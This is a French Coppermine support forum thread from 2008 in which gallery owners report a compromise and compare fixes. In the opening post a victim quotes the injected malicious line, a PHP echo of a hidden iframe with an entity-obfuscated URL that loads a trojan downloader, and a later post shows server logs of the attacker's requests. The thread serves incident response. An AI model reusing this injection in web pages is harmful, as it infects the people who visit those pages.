Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1] 2 3   Go Down

Author Topic: Galerie attaquée ?  (Read 42994 times)

0 Members and 1 Guest are viewing this topic.

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Galerie attaquée ?
« on: April 07, 2008, 11:07:56 pm »

Bonjour,

J'ai l'impression que ma galerie à subit une attaque, elle est inaccessible et il y a des morceaux de codes bizarres dans certaines pages...

Voici par exemple le message que j'ai sur la passage d'acceuil :

Quote
Parse error: syntax error, unexpected '<' in /mnt/123/sdb/9/2/galeriebar/coppermine/anycontent.php on line 33

On retrouve ce code ajouté à plusieurs pages :

Code: [Select]
<?php echo '<iframe src="&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;" width=1 height=1></iframe>'?>

Que dois-je faire ?


Merci de votre aide !
Logged

Pascal YAP

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 13833
  • Hello World :-)
    • CPG 1.5.x ExperiMental website
Re: Galerie attaquée ?
« Reply #1 on: April 07, 2008, 11:21:18 pm »

Aïe,
C'est exact !
Il y a effectivement un "exploit" qui injecte des IFRAMEs chargés de code PHP.

Je ne connais pas actuellement d'autres solutions que celles d'Uploader des fichiers "propres".
On ne doute pas que le problème semble sérieux, sans être destructeur...

Y-a-t-il un CMS tel Joomla ou SMF sur votre web ?

PYAP

ps : je connais hélas ce problème depuis le 03 Avril 2008  ???
« Last Edit: April 07, 2008, 11:52:26 pm by Pascal YAP »
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #2 on: April 07, 2008, 11:47:02 pm »

Je vais envoyer les fichiers propres et en profiter pour passer la galerie en 1.4.16, je suis actuellement en 1.4.14 !

J'ai du mal à comprendre comment ce code à réussi à être injecté, est-ce que quelqu'un pourrait m'expliquer ?

En fait j'ai été averti par un membre pour lequel son antivirus (Kaspersky) lui à indiqué la présence de ce script malicieux 'Trojan-télécharger.JS.Psyme.yc' mais je ne le trouve nul part et comment savoir si ce script à infecté mon ordinateur (ou celui d'autres membres) ? Est-ce qu'il faut faire une manipulation particulière pour qu'il s'active ?
Logged

Pascal YAP

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 13833
  • Hello World :-)
    • CPG 1.5.x ExperiMental website
Re: Galerie attaquée ?
« Reply #3 on: April 07, 2008, 11:52:04 pm »

La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #4 on: April 08, 2008, 12:21:59 am »

Tu as le lien de la discussion ?

Sinon est-ce que la 1.4.16 corrige cette faille de sécurité ou autant attendre quelques jours la 1.4.17 ? Car en fait j'ai des modifications de certains fichiers php et c'est toujours chiant de devoir ensuite retrouver ce qu'on à modifié manuellement !

D'ailleurs à quand une méthode de mise à jour digne de ce nom chez Coppermine ? Marre de devoir envoyer tous les fichiers comme un barbare à chaque mise à jour...
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #5 on: April 08, 2008, 12:38:42 am »

Je fais un double message pour vous informer de quelque chose d'important :

Ce fichier malicieux m'a édité la base de donnée !!! Le contenu de la table config était complètement chamboulé, je l'ai remplacé par l'ancien mais j'aimerais bien savoir s'il n'a pas édité autre chose, surtout que s'il peut accéder à la bdd il peut très bien tout supprimer !
Logged

poubao

  • Contributor
  • Coppermine frequent poster
  • ***
  • Country: la
  • Offline Offline
  • Gender: Male
  • Posts: 277
    • Collections du Laos
Re: Galerie attaquée ?
« Reply #6 on: April 08, 2008, 06:25:30 am »

Bonjour,
Moi dimanche, je n'ai eu que les fichiers du plugin onlinestats de modifiés, tous les fichiers, y compris les fichiers langues, solution, désactiver ce plugin, (pour mon cas !!)
par précaution, effacement de tous les fichiers présents sur le serveur (je posséde une sauvegarde récente de toute ma galerie, y compris le répertoire Album),
Réinstallation complête, j'en ai profité pour modifier tous les mots de passes d'accés au serveur et aux bases de données.
Coppermine n'est pas la seule application qui ait été sujette à cette attaque.
La mise à jour vers CPG 1.416, semble limiter les dégats car je n'ai pas eut de modification de la BDD.
poubao ???
Logged
L'incohérence de ceux qui nous dirigent, l'incompétence de ceux qui nous commandent,sont un vibrant hommage pour ceux qui exécutent.
                                          **Général Patton**

Feerie21

  • Coppermine newbie
  • Offline Offline
  • Gender: Female
  • Posts: 11
    • Poppy Petal
Re: Galerie attaquée ?
« Reply #7 on: April 08, 2008, 10:55:21 am »

Je viens également de subir cette "attaque", est-ce qu'il y a un moyen d'arranger sa, en remplacant certain fichier ? en supprimant ?  :-[
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Galerie attaquée ?
« Reply #8 on: April 08, 2008, 11:37:31 am »

plusieurs personnes semblent être l'objet de cette attaque qui ne semble pas liée à coppermine puisque d'autres applications sont touchées.
Pour l'instant il n'y a pas de solution précise si ce n'est que ceux qui utilisent la version 1.4.16 sont moins touchés...
à suivre donc
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Pascal YAP

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 13833
  • Hello World :-)
    • CPG 1.5.x ExperiMental website
Re: Galerie attaquée ?
« Reply #9 on: April 08, 2008, 03:07:58 pm »

Quote
La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !
La discussion est impossible avec l'hébergeur... possédant la sciences infuse ???
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #10 on: April 08, 2008, 03:54:56 pm »

Je ne comprends pas le code malveillant est encore présent sur ma galerie mais avant le déclaration de doctype de la page, quel est le fichier qui est infecté ? Je ne le trouve pas...
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #11 on: April 08, 2008, 03:58:24 pm »

C'était un plugins autant pour moi...
Logged

poubao

  • Contributor
  • Coppermine frequent poster
  • ***
  • Country: la
  • Offline Offline
  • Gender: Male
  • Posts: 277
    • Collections du Laos
Re: Galerie attaquée ?
« Reply #12 on: April 08, 2008, 04:04:17 pm »

Le quel?
poubao :D
Logged
L'incohérence de ceux qui nous dirigent, l'incompétence de ceux qui nous commandent,sont un vibrant hommage pour ceux qui exécutent.
                                          **Général Patton**

Pascal YAP

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 13833
  • Hello World :-)
    • CPG 1.5.x ExperiMental website
Re: Galerie attaquée ?
« Reply #13 on: April 08, 2008, 04:28:27 pm »

Quote
La discussion est impossible avec l'hébergeur... possédant la sciences infuse
Quote
Le quel?
poubao
Celui qui commence par ***, et qui est connu pour ces ////  ;D

Quote
C'était un plugins autant pour moi...
Quote
Le quel?
poubao
A mon humble avis, tous les scripts semblent être perméables  ???
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #14 on: April 08, 2008, 04:40:30 pm »

Le quel?
poubao :D

Tous, j'avais oublié d'envoyer de ré envoyer le dossier !
Logged

Coline

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 55
Re: Galerie attaquée ?
« Reply #15 on: April 08, 2008, 08:40:23 pm »

J'ai également un virus sur la galerie, un logiciel veut se lancer,
Il se nomme cdpuvbhfzz
Comment faire pour l'enlever?
Est ce le même que vous?
merci
Logged

mafieuso

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 85
Re: Galerie attaquée ?
« Reply #16 on: April 08, 2008, 08:45:00 pm »

Je crains que oui... mais chez moi rien ne voulait se lancer c'est bizarre, est-ce que ça dépend du navigateur ?
Logged

Coline

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 55
Re: Galerie attaquée ?
« Reply #17 on: April 08, 2008, 08:46:22 pm »

Chez moi ça se lance mais ça fait des choses bizarres (tous ce décalle)
Logged

DavidG

  • Coppermine newbie
  • Offline Offline
  • Posts: 5
Re: Galerie attaquée ?
« Reply #18 on: April 08, 2008, 09:03:09 pm »

J'ai aussi subi cette attaque (3 fois) depuis ce WE. J'étais en version 1.4.14 et j'ai fais une mise à jour en 1.4.16 mais l'attaque a recommencé ce soir. Tous les fichiers php et html sont modifiés (ajout de IFRAME). L'attaque vient d'une IP russe ! voici le log de l'attaque de ce soir :

Code: [Select]
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:43 +0200] "GET /copper/ HTTP/1.1" 200 39035 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:48 +0200] "GET /copper/update.php HTTP/1.1" 200 31881 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:49 +0200] "POST /copper/upload.php HTTP/1.1" 200 8607 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 13653 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 8497 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:52 +0200] "POST /copper/admin.php HTTP/1.1" 200 8441 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:30 +0200] "GET /copper/?ff=1 HTTP/1.1" 200 18781 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:31 +0200] "GET /copper/ HTTP/1.1" 200 22137 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

en version 1.4.14 le log était différent :

Code: [Select]
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:54 +0200] "GET /copper/ HTTP/1.1" 200 68683 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:58 +0200] "GET /copper/update.php HTTP/1.1" 200 40384 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:59 +0200] "POST /copper/pluginmgr.php?op=upload HTTP/1.1" 302 47195 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:29:30 +0200] "GET /copper/plugins/docs.php HTTP/1.1" 200 14 "-" "Mozilla/8.0"


Logged

Coline

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 55
Re: Galerie attaquée ?
« Reply #19 on: April 08, 2008, 09:10:59 pm »

Mais comment faire?
On doit remettre les fichiers de la maj 1.4.6?
Logged
Pages: [1] 2 3   Go Up
 

Page created in 0.03 seconds with 20 queries.